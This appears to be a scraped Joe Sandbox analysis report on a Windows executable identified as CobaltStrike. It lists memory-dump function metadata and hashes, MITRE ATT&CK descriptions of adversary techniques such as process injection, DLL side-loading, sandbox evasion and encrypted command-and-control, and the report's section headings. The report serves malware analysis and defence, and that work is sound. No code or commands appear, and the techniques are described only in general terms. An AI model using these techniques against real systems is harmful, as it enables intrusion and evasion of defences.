Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$_errno$AllocHeap_callnewhmalloc
String ID:
API String ID: 3531731211-0
Opcode ID: bf2fa5ecadbf00b126af2478addb5279d637b8534d83bb3cc027b42e06044e64
Instruction ID: 2ca58b233e4ce586bf314da1fbea52d0bb60af3a3affee88dda63271b73d91f0
Opcode Fuzzy Hash: bf2fa5ecadbf00b126af2478addb5279d637b8534d83bb3cc027b42e06044e64
Instruction Fuzzy Hash: 1751907530824E51EA1BFB21B4603FA6775BFC0790F6604369E8E1F786DE78CA498742

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA724300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA724363

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: a9f70d8d661e754e97da783645b1eceb47fb1fb23061e2859f8b3bf798c97032
Instruction ID: d0580913ab1e5eb8c13c8d21d3948e361ebea39dd0969591fb01bcc89770b331
Opcode Fuzzy Hash: a9f70d8d661e754e97da783645b1eceb47fb1fb23061e2859f8b3bf798c97032
Instruction Fuzzy Hash: C041A1B220868A97EB5AEB22B4006FD77B0FBC4B88F544534DE9E4B785DF34DA458701

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73ACF8 Relevance: 5.1, APIs: 4, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0000017DEA73AD48
free.LIBCMT ref: 0000017DEA73AD94
free.LIBCMT ref: 0000017DEA73ADA5

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4350b5d869eca4339ae27fc6fc5fc27bb66f5a9d561c1982dceb1c24f79df318
Instruction ID: e0458d5ee88f3becfe2b785a077cc42713a6d9bb8b05e128e5a6f6537b10fb71
Opcode Fuzzy Hash: 4350b5d869eca4339ae27fc6fc5fc27bb66f5a9d561c1982dceb1c24f79df318
Instruction Fuzzy Hash: 2E215E31618A8A81FB5BFF62F5853B92B70EFC4B89F55423589CE0B65CCF29C6448352

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7xRIr23y7v.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Windows Analysis Report
7xRIr23y7v.exe

Function 0000017DEA72E3A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 152
networkfileCOMMONLIBRARYCODE

Function 0000017DEA73455C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Function 0000017DEA72D780 Relevance: 10.9, APIs: 7, Instructions: 395
memoryfileCOMMONLIBRARYCODE

Function 0000017DEA721184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Function 0083C720 Relevance: 1.5, APIs: 1, Instructions: 28
timeCOMMON

Function 0000017DEA72CA74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 268
COMMONLIBRARYCODE

Function 0000017DE2BE0128 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
networkmemoryfileCOMMON

Function 0000017DE2BE00D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
librarynetworkCOMMON

Function 0000017DEA72EC3C Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Function 0000017DE2BE02E7 Relevance: 3.1, APIs: 2, Instructions: 57
memoryfilenetworkCOMMON

Function 0000017DEA731458 Relevance: 3.1, APIs: 2, Instructions: 57
memoryCOMMONLIBRARYCODE

Function 0083C280 Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Function 0000017DEA337853 Relevance: 1.4, APIs: 1, Instructions: 136
memoryCOMMON